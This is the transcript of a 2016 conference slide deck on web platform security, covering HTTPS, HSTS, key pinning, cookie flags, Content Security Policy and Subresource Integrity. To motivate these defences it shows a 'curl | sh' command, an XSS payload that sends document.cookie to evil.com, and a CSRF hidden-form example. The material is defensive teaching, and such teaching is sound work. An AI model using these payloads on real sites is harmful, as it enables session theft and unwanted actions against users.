Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Web Platform Security
Search
Jérémy Courtial
October 26, 2016
Programming
0
47
Web Platform Security
Jérémy Courtial
October 26, 2016
Tweet
Share
More Decks by Jérémy Courtial
See All by Jérémy Courtial
sudo give the cloud
mrartichaut
0
25
An introduction to AppSec?
mrartichaut
0
43
Secure by design: introduction to threat modeling
mrartichaut
0
51
Taming secrets with Vault
mrartichaut
0
83
Lead Tech: Empowering the team
mrartichaut
0
47
go doSomeThing()
mrartichaut
0
52
Practical Cryptography : Data Encryption
mrartichaut
0
61
Practical Cryptography : Password Hashing
mrartichaut
1
73
HTTP/2 : One connection to rule them all
mrartichaut
1
60
Other Decks in Programming
See All in Programming
PipeCDのプラグイン化で目指すところ
warashi
1
260
「Cursor/Devin全社導入の理想と現実」のその後
saitoryc
0
770
たった 1 枚の PHP ファイルで実装する MCP サーバ / MCP Server with Vanilla PHP
okashoi
1
230
今ならAmazon ECSのサービス間通信をどう選ぶか / Selection of ECS Interservice Communication 2025
tkikuc
21
3.9k
『自分のデータだけ見せたい!』を叶える──Laravel × Casbin で複雑権限をスッキリ解きほぐす 25 分
akitotsukahara
2
620
ペアプロ × 生成AI 現場での実践と課題について / generative-ai-in-pair-programming
codmoninc
1
15k
High-Level Programming Languages in AI Era -Human Thought and Mind-
hayat01sh1da
PRO
0
730
Hypervel - A Coroutine Framework for Laravel Artisans
albertcht
1
110
Discover Metal 4
rei315
2
120
CursorはMCPを使った方が良いぞ
taigakono
1
240
Railsアプリケーションと パフォーマンスチューニング ー 秒間5万リクエストの モバイルオーダーシステムを支える事例 ー Rubyセミナー 大阪
falcon8823
5
1.1k
童醫院敏捷轉型的實踐經驗
cclai999
0
210
Featured
See All Featured
Dealing with People You Can't Stand - Big Design 2015
cassininazir
367
26k
Designing for Performance
lara
610
69k
Large-scale JavaScript Application Architecture
addyosmani
512
110k
A Modern Web Designer's Workflow
chriscoyier
694
190k
Being A Developer After 40
akosma
90
590k
Music & Morning Musume
bryan
46
6.6k
The Language of Interfaces
destraynor
158
25k
GraphQLの誤解/rethinking-graphql
sonatard
71
11k
Scaling GitHub
holman
459
140k
BBQ
matthewcrist
89
9.7k
Practical Tips for Bootstrapping Information Extraction Pipelines
honnibal
PRO
20
1.3k
Code Reviewing Like a Champion
maltzj
524
40k
Transcript
Web Platform Security Leveling up Jérémy Courtial Software Security Architect
_______ : noun [c]. An application entirely dedicated to execute
unknown code from unknown origin.
_______ : noun [c]. An application entirely dedicated to execute
unknown code from unknown origin. Rootkit ?
_______ : noun [c]. An application entirely dedicated to execute
unknown code from unknown origin. Malware ?
_______ : noun [c]. An application entirely dedicated to execute
unknown code from unknown origin. Trojan ?
_______ : noun [c]. An application entirely dedicated to execute
unknown code from unknown origin. Browser /ˈbraʊ.zɚ/
http://yolo.com Go!
curl -s http://yolo.com | sh VS http://yolo.com Go!
Browser : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to
execute unknown code from unknown origin.
Unknown origin
Unknown origin Unsecure
What is anyway ? www.google.com
What is anyway ? www.oodrive.com
What is anyway ? www.lol-cats.com
What is anyway ? 172.217.20.46
Unsecure origin
Unsecure origin
Transport Layer Security
Confidentiality Integrity Authentication
Other incentives "The green lock™"
Other incentives HTTP/2
Other incentives "Secure origins only" features
http https
GET /
GET / 302 Found Location: https://yolo.com
GET / 302 Found Location: https://yolo.com
None
None
302 Found
302 Found
302 Found
HTTP Strict Transport Security
Strict-Transport-Security :
max-age=31536000; Strict-Transport-Security :
includeSubdomains; max-age=31536000; Strict-Transport-Security :
http://yolo.com
http://yolo.com 307 Internal Redirect
https://yolo.com 307 Internal Redirect
307 Internal Redirect GET / https://yolo.com
Trust failure
TLS certificates are based on trust
Oh… trust … That's cute …
Trust-based systems don't have a good reliability record …
Certificate Authority failures Bad captive portal Every "Internal CA"
You've failed me for the last time
HTTP Certificate Pinning
Public-Key-Pins:
Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM=";
Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g=";
Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";
max-age=259200; Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";
includeSubDomains; max-age=259200; Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";
_______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to
execute unknown code from Browser _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to execute unknown code from unknown origin.
_______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to
execute unknown code from Browser _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to execute unknown code from secured origins.
Unknown code
XSS <h1>Hello, ${username}</h1>
XSS $username = "<img src=evil.com?cookies=" + document.cookie + "/>"
XSS <h1>Hello, <img src="evil.com?cookies =JSESSIONID=5FZ4DS…" /> </h1>
CSRF https://evil.com Click here!
CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post
<input value="I ❤ Justin Bieber" name="message" type="hidden">
CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post
<input value="I ❤ Justin Bieber" name="message" type="hidden">
CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post
<input value="I ❤ Justin Bieber" name="message" type="hidden">
Everybody love cookies !
Rename Cookie to Spinach ?
Rename Cookie to Spinach ? Brussel Sprout ?
REJECTED
Locking the cookie jar
Set-Cookie : JSESSIONID=12345;
Set-Cookie : JSESSIONID=12345; secure;
Set-Cookie : JSESSIONID=12345; secure; HttpOnly;
Set-Cookie : JSESSIONID=12345; sameSite = strict | lax; secure; HttpOnly;
Content Security Policy
Content-Security-Policy
: default-src 'none'; script-src 'self' 'api.google.com'; style-src … ; form-src
… ; connect-src …; Content-Security-Policy
: … report-uri …; script-src 'strict-dynamic' …; upgrade-insecure-requests; … Content-Security-Policy
Our data (cookies, assets) are locked. What about third parties
?
HTML JS JPG
CDN HTML JS JPG JS JPG
CDN HTML JS JPG JS JPG
CDN HTML JS JPG JS JPG
CDN HTML JS JPG JS JPG
Subresource Integrity
<script src="https://example.com/framework.js" > </script>
<script src="https://example.com/framework.js" </script> integrity="sha384-oqVuAfXR….Y8wC">
_______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to
execute unknown code from secured origins Browser unknown code
_______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to
execute unknown code from secured origins Browser trusted code
Many more Suborigins iframe sandboxing Credentials Management
https://www.w3.org/2011/webappsec/ @mikewest
Times have changed
Times have changed "secured" is the new default secured
What does secured means ? secured Least Privilege Authentication Integrity
Is our platform ? secured
Thank you Icons from Ismael Ruiz, Konstantin Velichko, Rémy Médard,
unlimicon (The Noun Project) and design.google.com/icons/